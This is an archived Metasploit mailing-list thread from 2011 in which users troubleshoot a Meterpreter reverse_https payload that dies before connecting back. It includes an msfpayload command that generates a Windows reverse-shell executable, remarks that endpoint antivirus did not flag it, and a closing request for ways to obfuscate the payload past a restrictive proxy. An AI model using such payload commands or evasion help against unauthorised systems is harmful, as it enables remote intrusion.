metasploit-framework March 2011 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] Meterpreter Reverse_HTTPS

Re: [framework] Meterpreter Reverse_HTTPS dies

From: Gerasimos Kassaras <g.kassaras_at_nospam>
Date: Wed Mar 09 2011 - 13:10:31 GMT
To: framework@spool.metasploit.com

I am working on a project with Jhon Mystikopoulos and we are trying to
pass a restrictive proxy web server any ideas about obfuscating the
payload?

So far I have tried:

1. Executables and failed (as expected)
2. VBS and failed (This time it failed on desktop)

On 9 March 2011 14:45, JOhn Mistikopoulos <mailtest1223133456@gmail.com> wrote:
> I changed the ip of the listener from 0.0.0.0 to the real IP and worked.
> Thanks everyone for the help!
>
> -- John
>
> On Sat, Mar 5, 2011 at 12:02 AM, Rob Fuller <mubix@room362.com> wrote:
>>
>> try setting LHOST on the listener to the IP of the host instead of
>> 0.0.0.0.
>> This is why I asked for a start to finish script. That way we aren't
>> shooting in the dark guessing what the problem might be.
>> Please copy from the point you make the binary to the point you pasted in
>> the original email, paste it to a paste bin, change your IP info to
>> something like 192.168.0.1 (attacker) and 192.168.0.2 (victim) so we can
>> better assist you.
>>
>> --
>> Rob Fuller | Mubix
>> Certified Checkbox Unchecker
>> Room362.com | Hak5.org
>>
>>
>> On Fri, Mar 4, 2011 at 9:28 AM, JOhn Mistikopoulos
>> <mailtest1223133456@gmail.com> wrote:
>>>
>>> Yeah, reverse_tcp works great.
>>> I have pasted the logs here:
>>> http://mail.metasploit.com/pipermail/framework/2011-February/007516.html
>>> Additionally, I 've created the payload with the following command:
>>> msfpayload windows/meterpreter/reverse_https LHOST=x.x.x.x  LPORT=443 X >
>>> /tmp/https.exe
>>> and started a multihandler listening at 0.0.0.0:443.
>>>
>>> On Thu, Mar 3, 2011 at 6:03 PM, Rob Fuller <mubix@room362.com> wrote:
>>>>
>>>> Does a different payload work? reverse_tcp for example. And
>>>> reverse_https doesn't use ActiveX so you shouldn't be seeing a iexplorer.exe
>>>> running unless of course if that's what you named your payload. It could be
>>>> a problem on your listener end.
>>>> Can you pastebin your process from start to finish? What exploit are you
>>>> running? Is it just a built binary?
>>>>
>>>> --
>>>> Rob Fuller | Mubix
>>>> Certified Checkbox Unchecker
>>>> Room362.com | Hak5.org
>>>>
>>>>
>>>> On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos
>>>> <mailtest1223133456@gmail.com> wrote:
>>>>>
>>>>> I have tried numerous scenarios such as:
>>>>> 1. Middle proxy servers (more than 3 different web proxy software)
>>>>> 2. A single proxy server
>>>>> 3. No proxy server
>>>>> 4. Over the internet and locally (get the same error)
>>>>> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
>>>>> 6. Tested with IE6, unpatched.
>>>>> 7. Tested with different user accounts and group policies.
>>>>> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as
>>>>> a threat)
>>>>> 9. Tested without any AV protection or Firewall-IPS.
>>>>>
>>>>> When I run the payload (for example the "exe" file in an unprotected PC
>>>>> - no AV, no IPS) I got the its name on the task manager just for a while and
>>>>> then dies.
>>>>> HoweverI don't see any instance of iexplorer.exe running.
>>>>>
>>>>>
>>>>> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm@metasploit.com> wrote:
>>>>>>
>>>>>> On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
>>>>>> > And then, the listener stops giving any other info.
>>>>>> > I went to the victim PC and realized that the payload exe had
>>>>>> > already dies.
>>>>>> > I couldn't see it on the task manager.
>>>>>> > Concurrently, I had been running wireshark.
>>>>>> > The two last packets were:
>>>>>> > 1. Victim => Listener (RST, ACK)
>>>>>> > 2. Listener => Victim (FIN, ACK)
>>>>>> >
>>>>>> > Finally I don't get any connections.
>>>>>> > Does anyone know how to fix this?
>>>>>>
>>>>>> Is there any network proxy/filter between the target and yourself? Is
>>>>>> the target running an endpoint protection product or HIPS? Is the
>>>>>> target
>>>>>> process a user-process (IE) or a system process (assuming
>>>>>> IE/user-land)?
>>>>>>
>>>>>> The reverse_https payload is finicky based on the WinInet profile of
>>>>>> the
>>>>>> user running the code.
>>>>>>
>>>>>> -HD
>>>>>> _______________________________________________
>>>>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>>>
>>>>>
>>>>> _______________________________________________
>>>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>>>
>>>>
>>>>
>>>> _______________________________________________
>>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>>
>>>
>>>
>>> _______________________________________________
>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>
>>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>

-- Regards Gerasimos Kassaras _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework